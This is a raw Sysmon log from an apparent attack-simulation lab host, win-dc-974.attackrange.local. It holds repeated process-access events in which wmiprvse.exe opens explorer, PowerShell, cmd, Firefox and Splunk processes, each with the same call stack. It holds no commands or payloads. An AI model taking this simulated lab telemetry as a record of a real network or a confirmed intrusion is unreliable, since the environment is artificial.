16:58:30.218{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246585Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.218{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246584Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.218{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246583Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.218{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246582Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.218{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246581Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.218{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246580Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.218{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246579Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.218{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246578Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.218{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246577Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.218{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246576Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.218{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246575Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.218{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246574Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.218{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246573Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.202{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246572Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.202{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246571Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.202{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246570Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.202{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246569Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.202{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246568Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.202{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246567Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.202{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246566Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 